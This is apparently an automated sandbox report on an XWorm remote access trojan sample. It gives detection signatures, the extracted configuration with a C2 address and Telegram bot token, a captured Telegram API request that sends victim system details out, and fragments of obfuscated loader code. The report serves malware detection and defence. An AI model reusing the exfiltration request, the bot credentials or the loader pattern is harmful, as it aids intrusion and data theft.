Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tE3ZXBTP0B.exe

Overview

General Information

Sample name:tE3ZXBTP0B.exe
renamed because original name is a hash value
Original sample name:6494baca6b375ea0e325947e94b20c9c3487b03c6ca1fe878c23662d4e547028.exe
Analysis ID:1562432
MD5:acf863dd1a3d9bea3677b677429e6963
SHA1:354c3a0cad99023988521d85cdfefb279cfdbbbc
SHA256:6494baca6b375ea0e325947e94b20c9c3487b03c6ca1fe878c23662d4e547028
Tags:89-40-31-232AsyncRATexeuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • tE3ZXBTP0B.exe (PID: 7360 cmdline: "C:\Users\user\Desktop\tE3ZXBTP0B.exe" MD5: ACF863DD1A3D9BEA3677B677429E6963)
  • cleanup
{"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
tE3ZXBTP0B.exeJoeSecurity_XWormYara detected XWormJoe Security
    tE3ZXBTP0B.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      tE3ZXBTP0B.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xfc48:$cnc4: POST / HTTP/1.1
      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000000.1742331709.0000000000D62000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000000.1742331709.0000000000D62000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x109da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x10a77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x10b8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xfa48:$cnc4: POST / HTTP/1.1
          Process Memory Space: tE3ZXBTP0B.exe PID: 7360JoeSecurity_XWormYara detected XWormJoe Security
            Process Memory Space: tE3ZXBTP0B.exe PID: 7360JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              SourceRuleDescriptionAuthorStrings
              0.0.tE3ZXBTP0B.exe.d60000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.0.tE3ZXBTP0B.exe.d60000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  0.0.tE3ZXBTP0B.exe.d60000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0xfc48:$cnc4: POST / HTTP/1.1
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T15:36:17.264734+010028536851A Network Trojan was detected192.168.2.449730149.154.167.220443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: tE3ZXBTP0B.exeAvira: detected
                  Source: 00000000.00000002.4190665782.0000000003041000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"}
                  Source: tE3ZXBTP0B.exeReversingLabs: Detection: 76%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: tE3ZXBTP0B.exeJoe Sandbox ML: detected
                  Source: tE3ZXBTP0B.exeString decryptor: 89.40.31.232
                  Source: tE3ZXBTP0B.exeString decryptor: 1717
                  Source: tE3ZXBTP0B.exeString decryptor: <Xwormmm>
                  Source: tE3ZXBTP0B.exeString decryptor: 28Nov2024
                  Source: tE3ZXBTP0B.exeString decryptor: USB.exe
                  Source: tE3ZXBTP0B.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: tE3ZXBTP0B.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49730 -> 149.154.167.220:443
                  Source: Malware configuration extractorURLs: 89.40.31.232
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: tE3ZXBTP0B.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.tE3ZXBTP0B.exe.d60000.0.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.4:49731 -> 89.40.31.232:1717
                  Source: global trafficHTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A79B301C4E3529A1CAD54%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GP23O5%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: global trafficHTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A79B301C4E3529A1CAD54%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GP23O5%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: tE3ZXBTP0B.exe, 00000000.00000002.4190665782.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: tE3ZXBTP0B.exeString found in binary or memory: https://api.telegram.org/bot
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  Operating System Destruction

                  barindex
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Source: tE3ZXBTP0B.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.0.tE3ZXBTP0B.exe.d60000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000000.1742331709.0000000000D62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeCode function: 0_2_00007FFD9B8B8EF20_2_00007FFD9B8B8EF2
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeCode function: 0_2_00007FFD9B8B0E000_2_00007FFD9B8B0E00
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeCode function: 0_2_00007FFD9B8B81460_2_00007FFD9B8B8146
                  Source: tE3ZXBTP0B.exe, 00000000.00000000.1742354062.0000000000D76000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRaw.exe4 vs tE3ZXBTP0B.exe
                  Source: tE3ZXBTP0B.exeBinary or memory string: OriginalFilenameRaw.exe4 vs tE3ZXBTP0B.exe
                  Source: tE3ZXBTP0B.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: tE3ZXBTP0B.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.0.tE3ZXBTP0B.exe.d60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000000.1742331709.0000000000D62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: tE3ZXBTP0B.exe, hMY5B4KaPYBa602NktZ1e4wVF.csCryptographic APIs: 'TransformFinalBlock'
                  Source: tE3ZXBTP0B.exe, hMY5B4KaPYBa602NktZ1e4wVF.csCryptographic APIs: 'TransformFinalBlock'
                  Source: tE3ZXBTP0B.exe, jK41xlYzptzDvBwid77hpLBxe.csCryptographic APIs: 'TransformFinalBlock'
                  Source: tE3ZXBTP0B.exe, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.csBase64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/2
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeMutant created: \Sessions\1\BaseNamedObjects\qnzzEC3SI3U6Qmbo
                  Source: tE3ZXBTP0B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: tE3ZXBTP0B.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: tE3ZXBTP0B.exeReversingLabs: Detection: 76%
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: tE3ZXBTP0B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: tE3ZXBTP0B.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: tE3ZXBTP0B.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: tE3ZXBTP0B.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: tE3ZXBTP0B.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
                  Source: tE3ZXBTP0B.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
                  Source: tE3ZXBTP0B.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeCode function: 0_2_00007FFD9B8BA23D push ebx; retn 0009h0_2_00007FFD9B8BA3CA
                  Source: C:\Users\user\Desktop\tE3ZXBTP0B.exeCode function: 0_2_00007FFD9B8B00BD pushad ; iretd 0_2_00007FFD9B8B00C1
                  Source: tE3ZXBTP0B.exe, lYfWlfT3r7Vqz88tbfAuCjKRe.csHigh entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL'
                  Source: tE3ZXBTP0B.exe, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid'
